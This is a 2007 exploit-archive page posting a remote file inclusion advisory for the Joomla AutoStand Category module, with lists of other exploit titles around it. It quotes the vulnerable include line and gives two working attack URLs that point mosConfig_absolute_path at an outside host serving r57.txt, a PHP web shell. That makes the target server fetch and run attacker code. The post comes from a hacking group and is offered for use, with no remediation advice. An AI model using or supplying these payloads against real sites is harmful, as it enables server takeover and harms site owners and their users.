exploits , vulnerabilities , articles , Joomla Module AutoStand 1.0 Remote File Inclusion Vulnerability

2007-04-18 Joomla Template Be2004-2 (index.php) Remote File Include Exploit
2007-04-17 Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI
2007-04-15 Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability
2007-04-12 Joomla Component mosMedia <= 1.0.8 Remote File Inclusion Vulnerability
2007-04-11 Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

2007-04-15

Joomla Module AutoStand 1.0 Remote File Inclusion Vulnerability

Rated as : High Risk

=======================================================
Joomla Module AutoStand Category <= 1.1 Remote File include
Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site : 
http://www.joomlafrance.org/telecharger/startdown/AutoStand_Category.html
=======================================================
Description: its a joomla module Shows the categories created
=======================================================

File : /mod_as_category/mod_as_category.php
#  include($mosConfig_absolute_path . 
"/components/com_autostand/languages/portuguese.php  <= line 10

# Don't allow direct acces to the file
  defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not 
allowed.' ); <= line  21+22
========================================================
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================



#Long Life Palestine
#www.Hack-Teach.com

securitydot.net - 2007-04-15

Exploits - newest 10 RSS | More

2007-06-15 38444 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23885 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit